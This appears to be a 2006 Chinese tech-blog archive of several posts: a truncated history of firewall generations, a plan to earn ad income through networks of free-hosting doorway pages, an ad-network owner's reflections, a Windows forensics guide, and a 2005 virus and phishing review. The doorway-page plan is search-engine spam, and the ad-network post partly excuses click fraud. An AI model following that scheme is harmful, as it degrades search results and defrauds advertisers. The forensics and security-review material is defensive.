为实现以上功能,在防火墙产品的开发中,人们广泛地应用了网络拓扑、计算机操作系统、路由、加密、访问控制、安全审计等成熟或先进的技术和手段。纵观防火墙近年来的发展,可以将其划分为如下四个阶段(即四代)。
3.1 基于路由器的防火墙
由于多数路由器本身就包含有分组过滤功能,故网络访问控制可能通过路控制来实现,从而使具有分组过滤功能的路由器成为第一代防火墙产品。第一代防火墙产品的特点是:
1)利用路由器本身对分组的解析,以访问控制表(Access List)方式实现对分组的过滤;
2)过滤判断的依据可以是:地址、端口号、IP旗标及其他网络特征;
3)只有分组过滤的功能,且防火墙与路由器是一体的。这样,对安全要求低的网络可以采用路由器附带防火墙功能的方法,而对安全性要求高的网络则需要单独利用一台路由器作为防火墙。
第一代防火墙产品的不足之处十分明显,具体表现为:
●路由协议十分灵活,本身具有安全漏洞,外部网络要探寻内部网络十分容易。例如,在使用FTP协议时,外部服务器容易从20号端口上与内部网相连,即使在路由器上设置了过滤规则,内部网络的20号端口仍可以由外部探寻。
●路由器上分组过滤规则的设置和配置存在安全隐患。对路由器中过滤规则的设置和配置十分复杂,它涉及到规则的逻辑一致性。作用端口的有效性和规则集的正确性,一般的网络系统管理员难于胜任,加之一旦出现新的协议,管理员就得加上更多的规则去限制,这往往会带来很多错误。
●路由器防火墙的最大隐患是:攻击者可以“假冒”地址。由于信息在网络上是以明文方式传送的,黑客(Hacker)可以在网络上伪造假的路由信息欺骗防火墙。
●路由器防火墙的本质缺陷是:由于路由器的主要功能是为网络访问提供动态的、灵活的路由,而防火墙则要对访问行为实施静态的、固定的控制,这是一对难以调和的矛盾,防火墙的规则设置会大大降低路由器的性能。
可以说基于路由器的防火墙技术只是网络安全的一种应急措施,用这种权宜之计去对付黑客的攻击是十分危险的。
3.2 用户化的防火墙工具套
为了弥补路由器防火墙的不足,很多大型用户纷纷要求以专门开发的防火墙系统来保护自己的网络,从而推动了用户防火墙工具套的出现。
作为第二代防火墙产品,用户化的防火墙工具套具有以下特征:
1)将过滤功能从路由器中独立出来,并加上审计和告警功能;
2)针对用户需求,提供模块化的软件包;
3)软件可以通过网络发送,用户可以自己动手构造防火墙;
4)与第一代防火墙相比,安全性提高了,价格也降低了。
由于是纯软件产品,第二代防火墙产品无论在实现上还是在维护上都对系统管理员提出了相当复杂的要求,并带来以下问题:
配置和维护过程复杂、费时;
对用户的技术要求高;
全软件实现,使用中出现差错的情况很多。
3.3 建立在通用操作系统上的防火墙
基于软件的防火墙在销售、使用和维护上的问题迫使防火墙开发商很快推出了建立在通用操
作系统上的商用防火墙产品。近年来市场上广泛使用的就是这一代产品,它们具有如下一些
特点:
1)是批量上市的专用防火墙产品;
2)包括分组过滤或者借用路由器的分组过滤功能;
3)装有专用的代理系统,监控所有协议的数据和指令;
4)保护用户编程空间和用户可配置内核参数的设置;
5)安全性和速度大大提高。
第三代防火墙有以纯软件实现的,也有以硬件方式实现的,它们已经得到了广大用户的认同
。但随着安全需求的变化和使用时间的推延,仍表现出不少问题,比如:
1)作为基础的操作系统及其内核往往不为防火墙管理者所知,由于源码的保密,其安全性
无从保证;
2)由于大多数防火墙厂商并非通用操作系统的厂商,通用操作系统厂商不会对操作系统的
分类 : 技术文摘 | 发表时间 15-01-2006
来源:落伍
第 1 步骤 – 搜索阶段 – 需花费时间:1 星期
- 搜寻有关和相关SEO的知识和如何优化并保存下来 1 天。
- 搜寻有关和相关你的网站的内容并保存下来 2 天。
- 搜寻有关和相关一连串跟你网站有相似内容的链接和搜寻引擎 3 天
- 搜寻有关和相关的广告联盟并把他们的链接都保存下来 1 天
第 2 步骤 – 建立及准备阶段 – 1 星期
- 买 1个玉米并从资料中找出可以指向免费空间的网站 1 天。
- 在你的主页上建立5个广告位置和在其它免费空间都指向你的主页,并在你其它页面都链接到你的主页上。 6天。
第 3 步骤 – 每天要操作的事情
- 你的网站在搜索引擎上放置你站里的一个页面其中包括链接和广告还有关键词
- 在你免费空间上同样的操作以上的步骤
- 在你其它的页面上链接到你放上去搜索引擎的页面,及链接到你的免费空间的页面上
- 用人工的去提交页面至所有的搜索引擎
每天重复的操作,最少一星期6天每天2-3小时
第 4 步骤 – 重复重复再重复
- 操作以上的步骤,最少一星期6天每天2-3小时,每天放置新的搜寻关键词
- 继续的再搜索让你更进一步的方法
- 不要做超过两个站
重复的材料 (页面。 免费空间和内容)在第一个月之后你就会发现你有不同的页面和关键词在搜索引擎上,只要有人输入相关关键词都可以找到你网站.
不要特地的去放置和你网站不相干的关键词和带来的流量
我们的游戏规则就是对准网站,流量,和广告商
在最初的几个星期里你是得不到什么的。
仅仅在30天后,你有30页面, 30个免费空间 和少数的流量, 而且互相关联。
在 3个月之后,你将会有每个中的 90 个, 270个页面,而且搜寻引擎已经登记了你的东西。 你或许不是在排名10名以内,你或许不是在排名1000名以内 ,但是你在搜索引擎上占有一定的位置,而且你将会得到一些流量。
那么你如何赚钱呢?
如果你一天有50个点击数,我们取出10%是有效的,那么50x270x10%
那每天将会有1350个独立的IP流量来点击你的广告
想正规操作没有捷径,只有重复重复再重复以上的步骤
分类 : 网络日志 | 发表时间 14-01-2006
来源:中国站长站论坛
最近整了一小联盟,得朋友支持还算有点小成绩,而我写了几个其他的文章好象还有小部分人有兴趣,而且我说的东西是我比较了解的东西,因为了解所以才能有说服力,说其他的我不行,但是对比广告这个,我想我的应该还是可以小谈一下的。广告,广告的目的是广而告之,当然广告的最终目的是把东西推广出去,或直接卖出去,那么这样才是广告的结束,我根据我目前所了解的谈一谈,我只是把我了解的,和我希望的,同时也是我个人预测的说一下,希望大家有钱的捧个钱场,没钱的凑个人场。
先说广告主:广告主先要核算广告是面向什么人,给什么层次的人看,才能选择好广告的投放,才能更好的发挥广告的作用,而不是单单从广告主方面的利益去想,要是广告主想一个自己稳赢利的方式来推广,那么我想,成功的几率很小,绝对不超过50%,为什么,商机,呵呵,100%的赢利把握,那还叫商机吗?商业都是50%博100%,有的甚至更底,因为这样才是商机,这才是营销推广。9588,掌上通他们也在做推广,可我们很难在网上见到他们的广告,为什么,因为他们的策划是稳赚的,注册一个给站长1块,可哪有网民注册啊,所以宣传的力度不大,当然也不是没人挂广告,肯定还是有人做的,不过肯定不多,因为机票是高端用户,同时机票的利润目前几乎已经没了,所以只能说可能他们不适合这么推广。金山,他们也是在做推广,点击一下给4分,安装一个平均给3毛,首先杀毒软件,大部分人还是要用的,其实是免费送正版,这么好的事,网民肯定乐意啊,那么站长也就喜欢了,这个里面站长的利益肯定是保证了,点了就有钱,按了就有钱,管你金山赚不赚得到,那么这个里面联盟和站长的风险就底了,那么推广力度就大了,但是金山呢,他们也是考虑了的,一个使用,或安装了金山的用户,就算你以后不购买正版,也就是不给金山钱,那么也不会闲着没事把他拆了装其他的吧,这样的人肯定有,不过也只是个别吧。所以金山后期的赢利模式可以说有60%左右的把握,那么他们就去博了,我想成功的几率还是很大的。所以说,一个广告主,要想推广,首先你得考虑你的广告怎么给站长钱,自己怎么赢利,把风险分开大家一起承担,那么就好合作了。
再说个人站长:站长主要是要能立刻看到收益,要能及时拿到钱,这个才是站长最关心的东西,也是站长最关注的东西,EQIFA迅速起来,为什么,因为EQIFA是按周给站长结算,美通的口号是什么?美通是每月20号汇钱,绝对不早也不晚,我们商务零捌是周六汇款,周六在你起床之前肯定可以收到我们的汇款,争取以后这这天弄为岳贵节(备注:说笑的),其实站长关心的是收益,想的是作弊,中国作弊的站长我想应该是及个别现象,但是这个我想可能也没办法根除,百度人工封站,3721和一搜帮你过滤内容,甚至连GOOGLE都开始人工干预了,alexa也处理的一些站,这些说明作弊是肯定存在的,但是中国的很多东西还是很好的,所以我有理由相信这个只是个别现象,但是是无法根除的,因为这样的人肯定是有的,这样的站长的存在有一定的必要性,因为他能发现不足,找出漏洞,这样才能更完善,更好的发展,所以我认为这样的站长也没什么不对,不过作为联盟,肯定不希望作弊,甚至很讨厌作弊,毛主席说,谁能无过?所以我希望作弊的朋友能把作弊的手段用在正道上,用在完善上。要是强迫网民点击的话,那么效果就要大打折扣了,所以这样的方式,我想联盟是不太喜欢的。
最后说联盟:不同的联盟适合不同的广告主,也适合不同的站长,因为程序,和运营模式等因素所影响,比如说在百度上做冷门关键词的广告效果肯定是最理想的,在3721上买公司实名是最理想的,在CCTV上打广告树立威信是最好的,百度搜索联盟网址大全占便宜,TOM新闻娱乐站占便宜,A8彩信音乐站占便宜,那么你根据你的站,看适合什么广告主,适合什么站长,因为只有广告适合你的站,那么才能给你的站带来更大的利润,也才能使联盟更好的发展,联盟必须保证广告主的利益才能细水长流,保证站长的利益才能日易兴隆。联盟最重要的是诚信,其次是好的合作通道,再过来才是考虑自己的利益。希望不久的将来我也能成为一个好联盟,呵呵。
其实大家都是为了赚钱,三者都是为了求财,只要相互有利益,那么我想合作才能长久,但是中国人向来不太团结,所以问题肯定会存在的,希望广告主多为站长想想,站长多为广告主想想,联盟嘛,就替双方多出出注意,赚点中介费。
分类 : 技术文摘 | 发表时间 06-01-2006
随着网络的不断扩大,网络安全更加会成为人们的一个焦点,同时也成为是否能进一步投入到更深更广领域的一个基石。当然网络的安全也是一个动态的概念,世界上没有绝对安全的网络,只有相对安全的网络。相对安全环境的取得可以通过不断地完善系统程序(及时给系统漏洞打上不同的补丁和给系统升级)、装上防火墙,同时对那些胆敢在网络上破坏秩序做出不义行为的人给予恰如其分的处理。这必然要牵涉到证据的收集,本文正是对这一方面的内容针对Windows系统进行研究。
一、Windows系统特性
Windows操作系统维护三个相互独立的日志文件:系统日志、应用程序日志、安全日志。
1.系统日志
系统日志记录系统进程和设备驱动程序的活动。它审核的系统事件包括启动失败的设备驱动程序、硬件错误、重复的IP地址,以及服务的启动、暂停和停止。系统日志包含由系统组件记录的事情。例如在系统日志中记录启动期间要加载的驱动程序或其他系统组件的故障。由系统组件记录的事件类型是预先确定的。系统日志还包括了系统组件出现的问题,比如启动时某个驱动程序加载失败等。
2.应用程序日志
应用程序日志包括关于用户程序和商业通用应用程序的运行方面的错误活动,它审核的应用程序事件包括所有错误或应用程序需要报告的信息。应用程序日志可以包括性能监视审核的事件以及由应用程序或一般程序记录的事件,比如失败登录的次数、硬盘使用的情况和其它重要的指针;比如数据库程序用应用程序日志来记录文件错误;比如开发人员决定所要记录的事件。
3.安全日志
安全日志通常是在应急响应调查阶段最有用的日志。调查员必须仔细浏览和过滤这些日志的输出,以识别它们包含的证据。安全日志主要用于管理员记载用户登录上网的情况。在安全日志中可以找到它使用的系统审核和安全处理。它审核的安全事件包括用户特权的变化、文件和目录访问、打印以及系统登录和注销。安全日志可以记录诸如有效的登录尝试等安全事件以及与资源使用有关的事件,例如创建、打开或删除应用文件。管理员可以指定在安全日志中记录的事件。例如如果你启用了登录审核,那么系统登录尝试就记录在安全日志中。
二、寻找“显形”证据
系统工具提供了对系统进一步的监视,在性能监视器中可以看到其图形化的变化情况。而计数器日志、跟踪日志和警报则提供了对本地或远端系统的监视记录,并可根据预定的设定进行特定的跟踪和报警。还可利用不同的用于配置、管理COM组件及应用的组件服务工具记录或查找相关信息。
1.查看三大日志
在计算机上维护有关应用程序、安全性系统事件的日志,可以使用事件查看器查看并管理事件日志。它用于收集计算机硬件、软件和系统整体方面的错误信息,也用来监视一些安全方面的问题。它可根据应用程序日志、安全日志和系统日志来源将记录分成3类。
事件查看器显示以下几种事件类型:error是指比较严重的问题,通常是出现了数据丢失或功能丢失。例如如果在启动期间服务加载失败,则会记录错误。Warning给出警告则表明情况暂时不严重,但可能会在将来引起错误,比如磁盘空间太少等。Information描述应用程序、驱动程序或服务的成功操作的事件。例如成功地加载网络驱动程序时会记录一个信息事件。Success audit审核访问尝试成功。例如将用户成功登录到系统上的尝试作为成功审核事件记录下来。Failure audit审核安全尝试失败。例如如果用户试图访问网络驱动器失败,该尝试就会作为失败审核事件记录下来。
注意启动系统时事件日志服务会自动启动,所有用户都可以查看应用程序日志和系统日志,但是只有管理员才能访问安全日志。默认情况下会关闭安全日志,所以管理员要记住设定启用。管理员既可以使用组策略启用安全日志记录,也可以在注册表中设置策略使系统在安全日志装满时停止运行。
基于主机的检测器可以检测到系统类库的改变或敏感位置文件的添加。当结合所有现有的基于网络的证据片断时,就有可能重建特定的网络事件,诸如文件传输、缓冲区溢出攻击,或在网络中使用被盗的用户帐号和密码等。
当调查计算机犯罪时,会发现很多潜在证据的来源,不仅包括基于主机的日志记录,而且还包括网络的日志记录以及其它的传统形式,如指纹、证词和证人。大多数的网络流量在它经过的路径上都留下了监查踪迹。路由器、防火墙、服务器、IDS检测器及其它的网络设备都会保存日志,记录基于网络的突发事件。DHCP服务器会在PC请求IP租用时记录网络访问。现代的防火墙允许管理员在创建监查日志时有很多种粒度。IDS检测器可以根据签名识别或异常的检测过滤器来捕获一个攻击的一部分。基于网络的日志记录以多种形式存储,可能源自不同的操作系统,可能需要特殊的软件才能访问和读取,这些日志在地理上是分散的,而且常常对当前系统时间有严重错误的解释。调查人员的挑战就在于查找所有的日志,并使之关联起来。从不同系统获得地理上分散的日志、为每个日志维护保管链、重建基于网络的突发事件,这一切都需要消耗大量的时间和密集的资源。
2.检查相关文件、执行关键词搜索
Windows系统同时进行对很多文件的输入和输出,所以几乎所有发生在系统上的活动都会留下一些发生的痕迹。它有许多临时文件、高速缓存文件、一个跟踪最近使用文件的注册文件、一个保留删除文件的回收站和无数的存储运行时间资料的其它位置。
在调查知识产权或所有权、信息的所有权、性骚扰以及任何实际上包含基于文本通信的问题上,对目标硬盘驱动器执行字符串搜索是非常重要的。很多不同的关键词可能对调查非常重要,这些关键词包括用户ID、密码、敏感资料(代码字)、已知的文件名和具体的主题词。字符串搜索可以在逻辑文件结构上执行,也可以在物理层次上执行。
3.鉴定未授权的用户帐号或组、“流氓”进程
检查用户管理器,寻找未授权的用户帐号;使用usrstat浏览域控制器中的域帐号,寻找可疑的项目;使用Event Viecser检查安全日志,筛选出事件为添加新帐号、启用用户帐号、改变帐号组和改变用户帐号的项目。
鉴定检查一个运行系统时,鉴定“流氓”进程是非常简单的。因为大部分“流氓”进程都要监听网络连接或探测网络以获得纯文本的用户ID和密码,这些进程很容易在执行过程中被发现。plist命令将列出正在运行的进程,listdlls将提供每个运行中进程的完整的命令行参数,fport将显示监听的进程以及他们所监听得到端口。对于未运行的系统上“流氓”进程,方法是在证据的整个逻辑卷内使用最新的病毒扫描程序进行扫描。如果选择在还原映象的文件系统上运行病毒检查工具,必须保证这个卷是只读的。
4.寻找隐藏文件和恢复被删除文件
所有的坏人都想隐藏一些事情,他们采取这样的办法:一旦一个内部攻击者选择在他的系统上执行未授权或不受欢迎的任务,他可能会让一些文件不可见。这些攻击者可能利用NTFS文件流,在合法文件后隐藏资料。还有可能
改变文件的扩展名或特意将文件名命为重要系统文件的名字,最后还可以把文件删除。
我们知道被删除的文件并不是真正被删除了,它们只是被标记为删除。这就意味着这些文件仍保存完好,直到新数据的写入覆盖了这些被删除文文件所在硬盘驱动器的物理空间。也就是说越早尝试,恢复一个文件成功的机会就越大。File Scavenger甚至可能在硬盘被重新格式化后还能进行恢复。
5.检查未授权的访问点和安全标识符SID
当检查到一个受害系统时,必须鉴别系统的访问点以确定进行访问的方式,一些工具都是鉴别系统访问点的重要工具,它们使用API调用以读取内核及用户空间的TCP和UDP连接表的内容。如果想捕获这一信息,需要允许通过还原映象引导系统。如果想在检查运行系统时完成这一步,则要在关闭系统以进行映象之前,比较这两个操作的结果,它们的差异表明存在未授权的后台程序。
SID用于唯一地标识一个用户或一个组。每一个系统都有自己的标识符。计算机标识府和用户标识符一起构成了SID.因此SID可以唯一地标识用户帐号。所以我们需要比较在受害机器上发现的SID和在中央认证机构记录的SID。
6.检查Scheduler Service运行的任务
攻击者常用的一个策略是让调度事件为他们打开后门程序、改变审核策略或者完成更险恶的事。比如删除文件。恶意的调度作业通常是用at或soon工具调度它们的。不带命令行参数的at命令可以显示任何已调度的作业。
7.分析信任关系
WINDOWS NT系统支持不可传递的或单向的信任。这意味着只能单方向提供访问和服务。即使你的NT PDC信任其它域,这个被信任的域也不需要信任你的PDC,因此被信任域中的用户能使用你所在域的服务,但是反过来就不行。WINDOWS 2000则支持可传递的信仰。
三、“隐形”证据的查找
由于攻击者的诡密性日益提高,他们还使用隐蔽信道的方法躲避检测。我们将隐蔽信道定义为所有秘密的、隐藏的、难以检测的通信方式。所有与此相关的证据称为“隐形”证据。
1.难以检测、回放的行为
所捕捉或被监视到的,但是还需要进行进一步详细检查才能识别出的那些未经授权的流量。这些行为包括诸如Loki 2.0 HTTP命令信道和邮件隧道效应等ICMP和UDP隐蔽信道。查找办法就是仔细检查所监视到的流量,提高鉴别能力。包括任何类型通信中的那些利用任何工具都不能按人们可读的方式显示或重构的各种行为。查看会话的最常见阻碍就是加密。更多的经验丰富的攻击者可以建立加密信道,使得网络监视失效。许多网络协议本质上就是难以回放的,X Windows通信、Netbus通信和其它传输大量图形信息的远程会话都是很难再现的。监视加密通信并不是完全没用,因为它可以证明在确定的IP地址之间没有进行通信。所需的证据就在于这些端点上。
2.难以跟踪到源IP地址的攻击行为
它可以通过拒绝服务攻击得到最好的证明。源IP地址通常是被伪装的,这就使得通过源地址跟踪源计算机是非常困难的。以日志文件或嗅探器捕获文件形式保存的电子证据所报告的是错误数据。被伪装的邮件或欺骗性的电子邮件也对按电子邮件跟踪到这些消息的原始计算机提出了挑战。人们会发现中继电子邮件服务器位于一个法律上不合作的国家,并通过此服务器发送伪造电子邮件。这些中继电子邮件服务器通常记录了原始计算机的IP地址,但是由于位于不合作的外国,所以无法获得这些信息。加大在网络边界的监视,充分发挥网关的识别作用,才是解决此类问题的唯一所选。
3.使得证据难以收集
通过下列方式可以使证据难以收集——加密文件、安装可装载的核心模块以便利用你的操作系统来对付你,以及对二进制文件使用“特洛伊木马”使攻击者的痕迹不过于明显。攻击者阻碍收集证据的另一个技巧是不断改变远程系统的端口。当攻击者以一种看起来随机的方式频繁地修改端口以初始化与受攻击系统的连接时,调查员很难实施获得相关信息的过程。
对于此种证据的查找,我们采取在线被动的网络监视办法以及通过IDS、 防火墙和其他信息源知道有关攻击的多种标志,同时不断总结有效的分析网络通信的调查方法。在网络中发现非法的服务器或通信的非法通道,这是最有效的方法。它为确定可疑行为的程度和确定以非法方式通信的相关系统提供了一种方法,以便确定将系统保持在线状态所冒的风险和系统脆弱程度。根据这些信息,可以采取适当的后续步骤或防范措施。同时并加大培训力度,不断提高监视技巧,加强有力的自动分析工具的开发。
4.免受监视的行为
包括ICMP通信、SMTP通信、POP通信、Usenet通信、在外部介质保存文件、看上去无害的Web通信,以及源于内部IP地址的通信。查找此类证据的唯一方法就是监视尽可能多的通信。
为了维持对攻击者的优势,预见攻击的变革是十分必要的。只有了解攻击者的目标才能知道可能遭受攻击的地方。只有了解这些目标才有可能预见到在网络上发生的攻击,由此我们既要熟悉合法通信的标准,又要深入了解各种网络协议本身然后进行网络监视并仔细检查网络通信以便确认各种不同类型的隐蔽通道,查找出不同的隐形证据。
计算机取证技术的研究是一个相当复杂的课题,本文力图从两个方面来对计算机取证技术的过程和步骤进行探讨,提出了一种较为完善的由易到难、由简单到复杂的方法。我们可以通过对“显形”证据查找的办法支持在小局域网、军队网进行计算机取证,也支持在英特网上查找一些简易的取证,通过对“隐形”证据查找的办法支持在大的局域网甚至在英特网上查找复杂的取证,为调查人员提供重要的调查线索和证据来源。
作者: lala
来 源: 《黑客防线》
分类 : 技术文摘 | 发表时间 02-01-2006
2005年,总有一些事件震撼人心,总有一些东西备受瞩目。这些关键词的背后,不仅仅是我们曾经关注的焦点,更是留给我们长久思考:2005年,我们的网络生活一起经历了什么?
“MSN性感鸡”,网络提前遭遇“禽流感”
2005年,禽流感席卷全球,让人闻鸡色变。
而网络上的“禽流感”更是早于现实,从2月3日开始,席卷全球互联网。
2月3日上午,金山、瑞星、江民等国内多家安全软件厂家,接到大量MSN用户中毒信息,一个名为“MSN性感鸡”的病毒迅速在互联网上疯狂传播。msn用户感染后会向所有好友发送病毒文件。MSN性感鸡除了利用MSN向外界发送病毒文件、消耗系统资源外,还会在中毒电脑里放置后门程序,使黑客可以远程控制该电脑,从而使用户面临极大的安全威胁。
在相对平静的2005年网络环境中,“MSN性感鸡”造成危害最严重的一个病毒。随着各大门户网站的即时通讯工具的推出,以及金山加加、盛大圈圈等的加入,病毒制造者利用IM(即时通讯工具)做为传播,已经成为了病毒传播的首选方式。金山毒霸反病毒服务中心整个2005年接到的感染报告中,通过IM工具传播的病毒高达270万次,排在所有病毒之首。这也使的国内IM厂家高度重视,腾讯推出的QQ2005,就在业界率先与杀毒厂商合作,与金山公司合作推出了国际首创的“QQ安全中心”。
金融机构成为网络钓鱼最青睐对象
2005年,美国超过300万的信用卡用户资料外斜,导致用户财产损失,同时,中国工商银行、中国银行等金融机构先后成为黑客们模仿的对象,设计了类似的网页,通过网络钓鱼的形式获取利益。这一现象在2005年以平均每个月73%的数字增长,使很多用户对于网络交易的信心大减。导致年底各家银行对于网络交易安全提高重视。
针这些对愈演愈烈的网上银行诈骗事件,中国人民银行于10月30日向社会公布《电子支付指引(第一号)》,对银行从事电子支付活动提出了指导性要求,对银行针对不同客户在电子支付类型、单笔支付金额和每日累计支付金额等方面作出合理限制。
各杀毒厂家纷纷披露主动防御计划反病毒欲改被动劣势
5月,业界一条以“网络安全惊曝黑幕”为题的报道,在原本还算平静的网络安全行业搅起千层巨浪。这篇报道毫不客气地将杀毒软件比做“过期药”,更将信息安全厂商们斥之为贩卖“过期药”的贩子。随后,国内著名信息安全厂商金山公司对外宣布,其杀毒软件“主动防御(ADP)”业已完成第二层(网络自防御)计划,并且证实该计划已经应用到当天发布的金山毒霸2005中小企业版当中。至此,包括金山、瑞星在内的国内主流信息安全厂商均做出高调反应,表明中国的信息安全厂商正试图扭转在与病毒竞争中长期被动的局面。
“主动防御”更像是一个贴身的保镖,勤勤恳恳、认认真真的监视着周围的可疑人物,让危险总能在最后一刻之前化解。“主动防御”以事实为依据,掌握用户计算机真实的安全状况,在用户还没有意识到之前,能给予用户更多的提示与建议,帮助用户构筑专家级水准的计算机安全防线。它是传统杀毒软件的超集,虽然它也需要传统方法的补充,但它的理念已经超越了单纯的杀毒,而是全面保护用户计算机的安全。它是安全软件未来的发展方向。
流氓软件引起公愤,人人喊打
6月21日,北京市网络行业协会联合新浪、搜狐、金山、瑞星等16家网络和软件企业联合起草了《软件产品行为安全自律公约》,联合承诺共同防范“流氓软件”带给网民的麻烦。随后,在北京市网络行业协会的网站上,接受网民的投诉,引起众多网民的关注与投诉。7月11日,网络行业协会根据网民的投诉,点名公布了10家流氓软件名单,包括了3721、淘宝、e趣、DUDU等家加知名软件。
2005年,间谍软件已经大面积闯入了我们的网络生活中。间谍软件从以前单一的收集用户信息和盗取有价账号等方式扩展到恶意广告。恶意广告的典型特征为:悄悄安装;不易卸载;保护自己使用低层技术与多种软件冲突;随时随地弹出骚扰广告。而目前在国内用户被侵扰最多的间谍软件就是恶意广告和盗号木马。90%以上的网民都直间或间接的受到此类间谍软件的侵扰。
狙击波,与时间赛跑的病毒
8月15日,金山公司率先截获了被称为历史上最快利用微软漏洞攻击电脑的病毒“狙击波”,危害程度直指当年的震荡波。在随后的24小时内,变种迅速,出现多个变种,给相对平静的2005年网络环境,带来阵阵涟漪。该病毒源自欧洲芬兰,之后在欧洲迅速流传。其中在美国蔓延,美国国会、美国有线电视台(CNN)、美国广播公司(ABC)、纽约时报等重要企业和政府机构遭受此次蠕虫狂潮的袭击,并造成部分网络瘫痪。在国内,华南地区尤其是广州地区的个人及企业用户中毒的较多。
名人、热点新闻成为病毒载体
2005年8月30日,被全国关注的“超级女声”总决赛进行之际,一个借着“超级女声”的名气传播的QQ病毒现身网络,盗窃用户的信息。“超级女声”也成为了2005年带毒的明星、热点事件最为突出的事件,其前后,包括:拉登、羽泉、周杰伦、禽流感、伦敦地铁爆炸等等,也成为了一个特别的现象。每当网上出现热点新闻或者热点人物的时候,各病毒监测中心的精神也都高度集中,不知道下一个遭毒手的会是哪一个?
手机病毒过百
11月15日,金山反病毒监测中心向国内智能手机用户发出预警在手机上传播的病毒已经跨越100个大门,达到102个。自从2004年6月第一次发现在手机上传播的病毒以后,手机恶意程序的数量大幅提升。目前手机病毒主要采用蓝牙、电子邮件、链接PC以及浏览互联网下载安装软件等多种方式传播。以损坏联系人名单、损耗电池、盗取资料和浪费话费等破坏为多。
为了应对越来越猖狂的手机病毒,金山公司于11月7日在国内率先推出了自主研发的手机杀毒软件——金山毒霸手机版(Kingsoft Mobile Secrity)杀毒软件,广大用户可以通过金山毒霸手机版专题免费下载,软件试用期为3个月。金山毒霸手机版具备运行在PC上的杀毒软件所有的必备功能,支持Windows Mobile与Symbian手机操作系统,不仅仅可以查、杀流行的手机病毒,对运行在手机上的宏病毒也能彻底清除。此外,金山毒霸手机版已经开始酝酿手机短信诈骗防范功能。
中国安全软件与国际接轨
11月17日,国际安全软件行业的重要会议,AVAR 反病毒大会第八届年会在天津经济技术开发区举行。这次AVAR反病毒大会在国信办、公安部和天津市政府的支持下,由国家计算机病毒应急处理中心、天津经济技术开发区、天津市信息办、天津市科委和天津市公安局等单位承办,这是AVAR年会首次在中国大陆举行。今年反病毒大会的主题是“从有线拓展到无线安全,从技术追求蜕变为网络犯罪”。来自美国、俄罗斯、法国、日本、冰岛、韩国等反病毒领域的专家做了精彩的报告。
在国际业界更多的关注中国安全事业的同时,国内通用软件也积极
的走出国门,与世界接轨。9月14日,国内安全软件的重要厂商金山公司,率先走出国门,宣布正式进入日本市场,并同时发布了金山毒霸日文版。日本媒体对于金山公司此次大规模进军日本市场给予了高度关注。会场座无虚席,包括日本NHK电视台、日经新闻社等八十多家主流媒体参加了发布会并予以报道。日本最大的电视台NHK在当晚以高度的关注的态势介绍了这次新闻发布会的情况,足见其对中国通用软件公司第一次进入日本市场的重视程度。该新闻以“日本用户接触到大量中国品牌的软件产品的日子,已经不远了”作为结束语。截至2005年11月,金山毒霸在日本的安装量已经超过50万。
金山、瑞星、赛门铁克集体转向互联网应用
12月6日,金山、瑞星、赛门铁克三家杀毒厂商不约而同地选择了同一天作为新品发布日期。几大杀毒厂商经过对2005年的病毒趋势分析,在2006年新品发布中,纷纷加大了针对互联网的应用产品。
回顾2005年的“安全状况”,除了“MSN性感鸡”、“狙击波”引起一定的关注之外,在2005年利用漏洞的病毒已经逐渐不再唱主角了。对电脑用户安全的最大威胁已经让位于以商业为目的,以欺骗用户为手段,严重干扰人们日常工作、数据安全和个人隐私的各类间谍软件。据《金山2005年安全报告》显示,间谍软件的危害已经超越传统病毒,成为互联网安全最大的威胁,感染率由2004年30%激增到2005年的90%。网络钓鱼事件更是层出不穷,这使得杀毒软件的发展方向将由传统的反病毒机制转向了捍卫全面的互联网安全。
中国互联网协会反垃圾邮件工作委员会成立
2005年12月9日,中国互联网协会在“中国互联网协会反垃圾邮件协调小组”的基础上正式成立中国第一个在行业内最具代表性的反垃圾邮件组织——“中国互联网协会反垃圾邮件工作委员会”,该工作委员会的成立意味着中国反垃圾邮件事业迈上了新的台阶。反垃圾邮件工作委员会由政府、商务网站共同创立。来自安全软件业界的金山公司、诺顿公司成为了理事会成员,为工作委员会提供技术方面的支持。
垃圾邮件的泛滥,占用了网民们本来就不大的信箱空间,使得真正有用的E-mail要么因为信箱已满而进不来,要么淹没在一大堆的垃圾邮件中。为了处理这些垃圾邮件还得让网民搭上不少宝贵的上网时间,总之空耗大家的时间、精力和钱财。更重要的是,垃圾邮件往往散布一些不确切的、夸大其词的消息,干一些骗人钱财的勾当,有的已经触犯了法律,它们对现实社会的危害也随着网络的日益普及而逐渐显现出来。
金山公司岁末公布“2005年十大病毒”
近日,金山毒霸反病毒中心根据金山毒霸全球反病毒中心、金山毒霸客户服务中心以及金山毒霸运营部门的联合统计,对外公布了“2005年十大病毒”。根据十大病毒名单的分析:2005年利用漏洞攻击的病毒已经不再唱主角,病毒的发展及危害呈现新的传播方式及破坏方式,不过漏洞攻击依然是混合型病毒常用的一种攻击方式。
报告显示:2005年,1月到10月,金山反病毒监测中心共截获或监测到的病毒达到50179个,其中木马、蠕虫、黑客病毒占其中的91%,以盗取用户有价帐号的木马病毒(如网银、QQ、网游)为主,多达2000多种,如果算上变种则就要超过万种,平均下来每天有30个病毒出现。
金山公司根据金山毒霸客户服务中以及金山毒霸全球反病毒中心提供的数据,总结出的2005年度十大计算机病毒包括:
QQMyRun (Worm.QQmsgMyRun.a)
传奇木马(Troj.PSWLMir)
台湾女孩(JS.Twgirl(Mht exploit)
MSN性感鸡(Worm.MSNLoveme.b)
罗伯特Hack.RBot(Blaster exploit)
灰鸽子(Win32.Hack.Huigezi)
狙击波(Worm.Zotob/Worm.Mytob)
书虫(Win32.Troj.QQMsgBook)
恶鹰 (Worm.Beagle)
10. Rootkit (Win32.Troj.Rootkit)
在这一年里,互联网虽然没有受到类似于去年的“振荡波”等恶性病毒的大面积侵害,而蠕虫病毒、间谍软件、网络钓鱼、木马病毒等就像“平静水面下的暗流”,不经意间即给电脑用户造成巨大的损失。具体呈现以下特征:
即时通讯平台成为病毒传播的温库
2005年即时通讯平台成为病毒的温床,攻击QQ、MSN的病毒大量衍生。例如攻击QQ的QQmsgMyRun、QQmsgBook已经成为了今年攻击QQ的毒王,而年初的“性感鸡”则是攻击MSN的典型病毒,在年初的互联网大兴风浪。病毒制造者利用即时通讯工具传播病毒,多是以重大事件、执点新闻和人物来欺骗用户,从而达到传播、感染的目的。
利益驱动病毒的产量
因为利益的驱动,以及网络游戏迅速成为网络生活的重要组成部分,因此导致网游木马的迅速衍生,大量的网游也造就了大量的网游木马,在本年专业的网游制作队伍大量出现,并通过互联网进行买卖。
漏洞仍是最大危胁
